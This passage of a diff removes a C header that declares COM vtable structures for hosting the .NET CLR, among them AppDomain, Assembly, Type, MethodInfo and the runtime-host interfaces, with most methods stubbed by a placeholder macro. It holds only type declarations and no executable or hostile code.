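-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef CLR_H
-#define CLR_H
-
-typedef struct _ICLRMetaHost ICLRMetaHost;
-typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
-typedef struct _ICorRuntimeHost ICorRuntimeHost;
-typedef struct _ICorConfiguration ICorConfiguration;
-typedef struct _IGCThreadControl IGCThreadControl;
-typedef struct _IGCHostControl IGCHostControl;
-typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
-typedef struct _AppDomain IAppDomain;
-typedef struct _Assembly IAssembly;
-typedef struct _Type IType;
-typedef struct _Binder IBinder;
-typedef struct _MethodInfo IMethodInfo;
-
-typedef void *HDOMAINENUM;
-
-typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
-REFCLSID clsid,
-REFIID riid,
-LPVOID *ppInterface);
-
-typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
-REFCLSID clsid,
-REFIID riid,
-LPVOID *ppInterface);
-
-
-typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
-
-typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
-
-typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
-ICLRRuntimeInfo *pRuntimeInfo,
-CallbackThreadSetFnPtr pfnCallbackThreadSet,
-CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
-
-typedef struct _BinderVtbl {
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IBinder * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */ void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IBinder * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IBinder * This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-DUMMY_METHOD(Invoke);
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(BindToMethod);
-DUMMY_METHOD(BindToField);
-DUMMY_METHOD(SelectMethod);
-DUMMY_METHOD(SelectProperty);
-DUMMY_METHOD(ChangeType);
-DUMMY_METHOD(ReorderArgumentArray);
-} BinderVtbl;
-
-typedef struct _Binder {
-BinderVtbl *lpVtbl;
-} Binder;
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
-
-typedef struct _AppDomainVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IAppDomain * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */ void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAppDomain * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAppDomain * This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-DUMMY_METHOD(Invoke);
-
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(InitializeLifetimeService);
-DUMMY_METHOD(GetLifetimeService);
-DUMMY_METHOD(Evidence);
-DUMMY_METHOD(add_DomainUnload);
-DUMMY_METHOD(remove_DomainUnload);
-DUMMY_METHOD(add_AssemblyLoad);
-DUMMY_METHOD(remove_AssemblyLoad);
-DUMMY_METHOD(add_ProcessExit);
-DUMMY_METHOD(remove_ProcessExit);
-DUMMY_METHOD(add_TypeResolve);
-DUMMY_METHOD(remove_TypeResolve);
-DUMMY_METHOD(add_ResourceResolve);
-DUMMY_METHOD(remove_ResourceResolve);
-DUMMY_METHOD(add_AssemblyResolve);
-DUMMY_METHOD(remove_AssemblyResolve);
-DUMMY_METHOD(add_UnhandledException);
-DUMMY_METHOD(remove_UnhandledException);
-DUMMY_METHOD(DefineDynamicAssembly);
-DUMMY_METHOD(DefineDynamicAssembly_2);
-DUMMY_METHOD(DefineDynamicAssembly_3);
-DUMMY_METHOD(DefineDynamicAssembly_4);
-DUMMY_METHOD(DefineDynamicAssembly_5);
-DUMMY_METHOD(DefineDynamicAssembly_6);
-DUMMY_METHOD(DefineDynamicAssembly_7);
-DUMMY_METHOD(DefineDynamicAssembly_8);
-DUMMY_METHOD(DefineDynamicAssembly_9);
-DUMMY_METHOD(CreateInstance);
-DUMMY_METHOD(CreateInstanceFrom);
-DUMMY_METHOD(CreateInstance_2);
-DUMMY_METHOD(CreateInstanceFrom_2);
-DUMMY_METHOD(CreateInstance_3);
-DUMMY_METHOD(CreateInstanceFrom_3);
-DUMMY_METHOD(Load);
-DUMMY_METHOD(Load_2);
-
-HRESULT (STDMETHODCALLTYPE *Load_3)(
-IAppDomain *This,
-SAFEARRAY *rawAssembly,
-IAssembly **pRetVal);
-
-DUMMY_METHOD(Load_4);
-DUMMY_METHOD(Load_5);
-DUMMY_METHOD(Load_6);
-DUMMY_METHOD(Load_7);
-DUMMY_METHOD(ExecuteAssembly);
-DUMMY_METHOD(ExecuteAssembly_2);
-DUMMY_METHOD(ExecuteAssembly_3);
-DUMMY_METHOD(FriendlyName);
-DUMMY_METHOD(BaseDirectory);
-DUMMY_METHOD(RelativeSearchPath);
-DUMMY_METHOD(ShadowCopyFiles);
-DUMMY_METHOD(GetAssemblies);
-DUMMY_METHOD(AppendPrivatePath);
-DUMMY_METHOD(ClearPrivatePath);
-DUMMY_METHOD(SetShadowCopyPath);
-DUMMY_METHOD(ClearShadowCopyPath);
-DUMMY_METHOD(SetCachePath);
-DUMMY_METHOD(SetData);
-DUMMY_METHOD(GetData);
-DUMMY_METHOD(SetAppDomainPolicy);
-DUMMY_METHOD(SetThreadPrincipal);
-DUMMY_METHOD(SetPrincipalPolicy);
-DUMMY_METHOD(DoCallBack);
-DUMMY_METHOD(DynamicDirectory);
-
-END_INTERFACE
-} AppDomainVtbl;
-
-typedef struct _AppDomain {
-AppDomainVtbl *lpVtbl;
-} AppDomain;
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
-
-typedef struct _AssemblyVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IAssembly * This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAssembly * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAssembly * This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-
-DUMMY_METHOD(Invoke);
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(CodeBase);
-DUMMY_METHOD(EscapedCodeBase);
-DUMMY_METHOD(GetName);
-DUMMY_METHOD(GetName_2);
-DUMMY_METHOD(FullName);
-
-HRESULT (STDMETHODCALLTYPE *EntryPoint)(
-IAssembly *This,
-IMethodInfo **pRetVal);
-
-HRESULT (STDMETHODCALLTYPE *GetType_2)(
-IAssembly *This,
-BSTR name,
-IType **pRetVal);
-
-DUMMY_METHOD(GetType_3);
-DUMMY_METHOD(GetExportedTypes);
-DUMMY_METHOD(GetTypes);
-DUMMY_METHOD(GetManifestResourceStream);
-DUMMY_METHOD(GetManifestResourceStream_2);
-DUMMY_METHOD(GetFile);
-DUMMY_METHOD(GetFiles);
-DUMMY_METHOD(GetFiles_2);
-DUMMY_METHOD(GetManifestResourceNames);
-DUMMY_METHOD(GetManifestResourceInfo);
-DUMMY_METHOD(Location);
-DUMMY_METHOD(Evidence);
-DUMMY_METHOD(GetCustomAttributes);
-DUMMY_METHOD(GetCustomAttributes_2);
-DUMMY_METHOD(IsDefined);
-DUMMY_METHOD(GetObjectData);
-DUMMY_METHOD(add_ModuleResolve);
-DUMMY_METHOD(remove_ModuleResolve);
-DUMMY_METHOD(GetType_4);
-DUMMY_METHOD(GetSatelliteAssembly);
-DUMMY_METHOD(GetSatelliteAssembly_2);
-DUMMY_METHOD(LoadModule);
-DUMMY_METHOD(LoadModule_2);
-DUMMY_METHOD(CreateInstance);
-DUMMY_METHOD(CreateInstance_2);
-DUMMY_METHOD(CreateInstance_3);
-DUMMY_METHOD(GetLoadedModules);
-DUMMY_METHOD(GetLoadedModules_2);
-DUMMY_METHOD(GetModules);
-DUMMY_METHOD(GetModules_2);
-DUMMY_METHOD(GetModule);
-DUMMY_METHOD(GetReferencedAssemblies);
-DUMMY_METHOD(GlobalAssemblyCache);
-
-END_INTERFACE
-} AssemblyVtbl;
-
-typedef enum _BindingFlags {
-BindingFlags_Default = 0,
-BindingFlags_IgnoreCase = 1,
-BindingFlags_DeclaredOnly = 2,
-BindingFlags_Instance = 4,
-BindingFlags_Static = 8,
-BindingFlags_Public = 16,
-BindingFlags_NonPublic = 32,
-BindingFlags_FlattenHierarchy = 64,
-BindingFlags_InvokeMethod = 256,
-BindingFlags_CreateInstance = 512,
-BindingFlags_GetField = 1024,
-BindingFlags_SetField = 2048,
-BindingFlags_GetProperty = 4096,
-BindingFlags_SetProperty = 8192,
-BindingFlags_PutDispProperty = 16384,
-BindingFlags_PutRefDispProperty = 32768,
-BindingFlags_ExactBinding = 65536,
-BindingFlags_SuppressChangeType = 131072,
-BindingFlags_OptionalParamBinding = 262144,
-BindingFlags_IgnoreReturn = 16777216
-} BindingFlags;
-
-typedef struct _Assembly {
-AssemblyVtbl *lpVtbl;
-} Assembly;
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
-
-typedef struct _TypeVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IType * This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IType * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IType * This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-DUMMY_METHOD(Invoke);
-
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(MemberType);
-DUMMY_METHOD(name);
-DUMMY_METHOD(DeclaringType);
-DUMMY_METHOD(ReflectedType);
-DUMMY_METHOD(GetCustomAttributes);
-DUMMY_METHOD(GetCustomAttributes_2);
-DUMMY_METHOD(IsDefined);
-DUMMY_METHOD(Guid);
-DUMMY_METHOD(Module);
-DUMMY_METHOD(Assembly);
-DUMMY_METHOD(TypeHandle);
-DUMMY_METHOD(FullName);
-DUMMY_METHOD(Namespace);
-DUMMY_METHOD(AssemblyQualifiedName);
-DUMMY_METHOD(GetArrayRank);
-DUMMY_METHOD(BaseType);
-DUMMY_METHOD(GetConstructors);
-DUMMY_METHOD(GetInterface);
-DUMMY_METHOD(GetInterfaces);
-DUMMY_METHOD(FindInterfaces);
-DUMMY_METHOD(GetEvent);
-DUMMY_METHOD(GetEvents);
-DUMMY_METHOD(GetEvents_2);
-DUMMY_METHOD(GetNestedTypes);
-DUMMY_METHOD(GetNestedType);
-DUMMY_METHOD(GetMember);
-DUMMY_METHOD(GetDefaultMembers);
-DUMMY_METHOD(FindMembers);
-DUMMY_METHOD(GetElementType);
-DUMMY_METHOD(IsSubclassOf);
-DUMMY_METHOD(IsInstanceOfType);
-DUMMY_METHOD(IsAssignableFrom);
-DUMMY_METHOD(GetInterfaceMap);
-DUMMY_METHOD(GetMethod);
-DUMMY_METHOD(GetMethod_2);
-DUMMY_METHOD(GetMethods);
-DUMMY_METHOD(GetField);
-DUMMY_METHOD(GetFields);
-DUMMY_METHOD(GetProperty);
-DUMMY_METHOD(GetProperty_2);
-DUMMY_METHOD(GetProperties);
-DUMMY_METHOD(GetMember_2);
-DUMMY_METHOD(GetMembers);
-DUMMY_METHOD(InvokeMember);
-DUMMY_METHOD(UnderlyingSystemType);
-DUMMY_METHOD(InvokeMember_2);
-
-HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
-IType *This,
-BSTR name,
-BindingFlags invokeAttr,
-IBinder *Binder,
-VARIANT Target,
-SAFEARRAY *args,
-VARIANT *pRetVal);
-
-DUMMY_METHOD(GetConstructor);
-DUMMY_METHOD(GetConstructor_2);
-DUMMY_METHOD(GetConstructor_3);
-DUMMY_METHOD(GetConstructors_2);
-DUMMY_METHOD(TypeInitializer);
-DUMMY_METHOD(GetMethod_3);
-DUMMY_METHOD(GetMethod_4);
-DUMMY_METHOD(GetMethod_5);
-DUMMY_METHOD(GetMethod_6);
-DUMMY_METHOD(GetMethods_2);
-DUMMY_METHOD(GetField_2);
-DUMMY_METHOD(GetFields_2);
-DUMMY_METHOD(GetInterface_2);
-DUMMY_METHOD(GetEvent_2);
-DUMMY_METHOD(GetProperty_3);
-DUMMY_METHOD(GetProperty_4);
-DUMMY_METHOD(GetProperty_5);
-DUMMY_METHOD(GetProperty_6);
-DUMMY_METHOD(GetProperty_7);
-DUMMY_METHOD(GetProperties_2);
-DUMMY_METHOD(GetNestedTypes_2);
-DUMMY_METHOD(GetNestedType_2);
-DUMMY_METHOD(GetMember_3);
-DUMMY_METHOD(GetMembers_2);
-DUMMY_METHOD(Attributes);
-DUMMY_METHOD(IsNotPublic);
-DUMMY_METHOD(IsPublic);
-DUMMY_METHOD(IsNestedPublic);
-DUMMY_METHOD(IsNestedPrivate);
-DUMMY_METHOD(IsNestedFamily);
-DUMMY_METHOD(IsNestedAssembly);
-DUMMY_METHOD(IsNestedFamANDAssem);
-DUMMY_METHOD(IsNestedFamORAssem);
-DUMMY_METHOD(IsAutoLayout);
-DUMMY_METHOD(IsLayoutSequential);
-DUMMY_METHOD(IsExplicitLayout);
-DUMMY_METHOD(IsClass);
-DUMMY_METHOD(IsInterface);
-DUMMY_METHOD(IsValueType);
-DUMMY_METHOD(IsAbstract);
-DUMMY_METHOD(IsSealed);
-DUMMY_METHOD(IsEnum);
-DUMMY_METHOD(IsSpecialName);
-DUMMY_METHOD(IsImport);
-DUMMY_METHOD(IsSerializable);
-DUMMY_METHOD(IsAnsiClass);
-DUMMY_METHOD(IsUnicodeClass);
-DUMMY_METHOD(IsAutoClass);
-DUMMY_METHOD(IsArray);
-DUMMY_METHOD(IsByRef);
-DUMMY_METHOD(IsPointer);
-DUMMY_METHOD(IsPrimitive);
-DUMMY_METHOD(IsCOMObject);
-DUMMY_METHOD(HasElementType);
-DUMMY_METHOD(IsContextful);
-DUMMY_METHOD(IsMarshalByRef);
-DUMMY_METHOD(Equals_2);
-
-END_INTERFACE
-} TypeVtbl;
-
-typedef struct ICLRRuntimeInfoVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-ICLRRuntimeInfo * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-ICLRRuntimeInfo * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-ICLRRuntimeInfo * This);
-
-HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
-ICLRRuntimeInfo * This,
-/* [size_is][out] */
-__out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
-/* [out][in] */ DWORD *pcchBuffer);
-
-HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
-ICLRRuntimeInfo * This,
-/* [size_is][out] */
-__out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
-/* [out][in] */ DWORD *pcchBuffer);
-
-HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
-ICLRRuntimeInfo * This,
-/* [in] */ HANDLE hndProcess,
-/* [retval][out] */ BOOL *pbLoaded);
-
-HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
-ICLRRuntimeInfo * This,
-/* [in] */ UINT iResourceID,
-/* [size_is][out] */
-__out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
-/* [out][in] */ DWORD *pcchBuffer,
-/* [lcid][in] */ LONG iLocaleID);
-
-HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
-ICLRRuntimeInfo * This,
-/* [in] */ LPCWSTR pwzDllName,
-/* [retval][out] */ HMODULE *phndModule);
-
-HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
-ICLRRuntimeInfo * This,
-/* [in] */ LPCSTR pszProcName,
-/* [retval][out] */ LPVOID *ppProc);
-
-HRESULT ( STDMETHODCALLTYPE *GetInterface )(
-ICLRRuntimeInfo * This,
-/* [in] */ REFCLSID rclsid,
-/* [in] */ REFIID riid,
-/* [retval][iid_is][out] */ LPVOID *ppUnk);
-
-HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
-ICLRRuntimeInfo * This,
-/* [retval][out] */ BOOL *pbLoadable);
-
-HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
-ICLRRuntimeInfo * This,
-/* [in] */ DWORD dwStartupFlags,
-/* [in] */ LPCWSTR pwzHostConfigFile);
-
-HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
-ICLRRuntimeInfo * This,
-/* [out] */ DWORD *pdwStartupFlags,
-/* [size_is][out] */
-__out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
-/* [out][in] */ DWORD *pcchHostConfigFile);
-
-HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
-ICLRRuntimeInfo * This);
-
-HRESULT ( STDMETHODCALLTYPE *IsStarted )(
-ICLRRuntimeInfo * This,
-/* [out] */ BOOL *pbStarted,
-/* [out] */ DWORD *pdwStartupFlags);
-
-END_INTERFACE
-} ICLRRuntimeInfoVtbl;
-
-typedef struct _ICLRRuntimeInfo {
-ICLRRuntimeInfoVtbl *lpVtbl;
-} ICLRRuntimeInfo;
-
-typedef struct _Type {
-TypeVtbl *lpVtbl;
-} Type;
-
-typedef struct ICLRMetaHostVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-ICLRMetaHost * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-ICLRMetaHost * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-ICLRMetaHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
-ICLRMetaHost * This,
-/* [in] */ LPCWSTR pwzVersion,
-/* [in] */ REFIID riid,
-/* [retval][iid_is][out] */ LPVOID *ppRuntime);
-
-HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
-ICLRMetaHost * This,
-/* [in] */ LPCWSTR pwzFilePath,
-/* [size_is][out] */
-__out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
-/* [out][in] */ DWORD *pcchBuffer);
-
-HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
-ICLRMetaHost * This,
-/* [retval][out] */ IEnumUnknown **ppEnumerator);
-
-HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
-ICLRMetaHost * This,
-/* [in] */ HANDLE hndProcess,
-/* [retval][out] */ IEnumUnknown **ppEnumerator);
-
-HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
-ICLRMetaHost * This,
-/* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
-
-HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
-ICLRMetaHost * This,
-/* [in] */ REFIID riid,
-/* [retval][iid_is][out] */ LPVOID *ppUnk);
-
-HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
-ICLRMetaHost * This,
-/* [in] */ INT32 iExitCode);
-
-END_INTERFACE
-} ICLRMetaHostVtbl;
-
-typedef struct _ICLRMetaHost
-{
-ICLRMetaHostVtbl *lpVtbl;
-} ICLRMetaHost;
-
-typedef struct ICorRuntimeHostVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-ICorRuntimeHost * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-ICorRuntimeHost * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
-ICorRuntimeHost * This,
-/* [in] */ DWORD *pFiberCookie);
-
-HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
-ICorRuntimeHost * This,
-/* [out] */ DWORD **pFiberCookie);
-
-HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
-ICorRuntimeHost * This,
-/* [out] */ DWORD *pCount);
-
-HRESULT ( STDMETHODCALLTYPE *MapFile )(
-ICorRuntimeHost * This,
-/* [in] */ HANDLE hFile,
-/* [out] */ HMODULE *hMapAddress);
-
-HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
-ICorRuntimeHost * This,
-/* [out] */ ICorConfiguration **pConfiguration);
-
-HRESULT ( STDMETHODCALLTYPE *Start )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *Stop )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
-ICorRuntimeHost * This,
-/* [in] */ LPCWSTR pwzFriendlyName,
-/* [in] */ IUnknown *pIdentityArray,
-/* [out] */ IUnknown **pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
-ICorRuntimeHost * This,
-/* [out] */ IUnknown **pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
-ICorRuntimeHost * This,
-/* [out] */ HDOMAINENUM *hEnum);
-
-HRESULT ( STDMETHODCALLTYPE *NextDomain )(
-ICorRuntimeHost * This,
-/* [in] */ HDOMAINENUM hEnum,
-/* [out] */ IUnknown **pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
-ICorRuntimeHost * This,
-/* [in] */ HDOMAINENUM hEnum);
-
-HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
-ICorRuntimeHost * This,
-/* [in] */ LPCWSTR pwzFriendlyName,
-/* [in] */ IUnknown *pSetup,
-/* [in] */ IUnknown *pEvidence,
-/* [out] */ IUnknown **pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
-ICorRuntimeHost * This,
-/* [out] */ IUnknown **pAppDomainSetup);
-
-HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
-ICorRuntimeHost * This,
-/* [out] */ IUnknown **pEvidence);
-
-HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
-ICorRuntimeHost * This,
-/* [in] */ IUnknown *pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
-ICorRuntimeHost * This,
-/* [out] */ IUnknown **pAppDomain);
-
-END_INTERFACE
-} ICorRuntimeHostVtbl;
-
-typedef struct _ICorRuntimeHost {
-ICorRuntimeHostVtbl *lpVtbl;
-} ICorRuntimeHost;
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
-
-typedef struct _MethodInfoVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IMethodInfo *This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IMethodInfo *This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IMethodInfo *This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-DUMMY_METHOD(Invoke);
-
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(MemberType);
-DUMMY_METHOD(name);
-DUMMY_METHOD(DeclaringType);
-DUMMY_METHOD(ReflectedType);
-DUMMY_METHOD(GetCustomAttributes);
-DUMMY_METHOD(GetCustomAttributes_2);
-DUMMY_METHOD(IsDefined);
-
-HRESULT ( STDMETHODCALLTYPE *GetParameters)(
-IMethodInfo *This,
-SAFEARRAY **pRetVal);
-
-DUMMY_METHOD(GetMethodImplementationFlags);
-DUMMY_METHOD(MethodHandle);
-DUMMY_METHOD(Attributes);
-DUMMY_METHOD(CallingConvention);
-DUMMY_METHOD(Invoke_2);
-DUMMY_METHOD(IsPublic);
-DUMMY_METHOD(IsPrivate);
-DUMMY_METHOD(IsFamily);
-DUMMY_METHOD(IsAssembly);
-DUMMY_METHOD(IsFamilyAndAssembly);
-DUMMY_METHOD(IsFamilyOrAssembly);
-DUMMY_METHOD(IsStatic);
-DUMMY_METHOD(IsFinal);
-DUMMY_METHOD(IsVirtual);
-DUMMY_METHOD(IsHideBySig);
-DUMMY_METHOD(IsAbstract);
-DUMMY_METHOD(IsSpecialName);
-DUMMY_METHOD(IsConstructor);
-
-HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
-IMethodInfo *This,
-VARIANT obj,
-SAFEARRAY *parameters,
-VARIANT *ret);
-
-DUMMY_METHOD(returnType);
-DUMMY_METHOD(ReturnTypeCustomAttributes);
-DUMMY_METHOD(GetBaseDefinition);
-
-END_INTERFACE
-} MethodInfoVtbl;
-
-typedef struct _MethodInfo {
-MethodInfoVtbl *lpVtbl;
-} MethodInfo;
-
-typedef struct ICorConfigurationVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-ICorConfiguration * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-ICorConfiguration * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-ICorConfiguration * This);
-
-HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
-ICorConfiguration * This,
-/* [in] */ IGCThreadControl *pGCThreadControl);
-
-HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
-ICorConfiguration * This,
-/* [in] */ IGCHostControl *pGCHostControl);
-
-HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
-ICorConfiguration * This,
-/* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
-
-HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
-ICorConfiguration * This,
-/* [in] */ DWORD dwSpecialThreadId);
-
-END_INTERFACE
-} ICorConfigurationVtbl;
-
-typedef struct _ICorConfiguration
-{
-ICorConfigurationVtbl *lpVtbl;
-}ICorConfiguration;
-
-typedef struct IGCThreadControlVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IGCThreadControl * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IGCThreadControl * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IGCThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
-IGCThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
-IGCThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
-IGCThreadControl * This,
-DWORD Generation);
-
-END_INTERFACE
-} IGCThreadControlVtbl;
-
-typedef struct _IGCThreadControl
-{
-IGCThreadControlVtbl *lpVtbl;
-}IGCThreadControl;
-
-typedef struct IGCHostControlVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IGCHostControl * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IGCHostControl * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IGCHostControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
-IGCHostControl * This,
-/* [in] */ SIZE_T sztMaxVirtualMemMB,
-/* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
-
-END_INTERFACE
-} IGCHostControlVtbl;
-
-typedef struct _IGCHostControl
-{
-IGCHostControlVtbl *lpVtbl;
-} IGCHostControl;
-
-typedef struct IDebuggerThreadControlVtbl
-{
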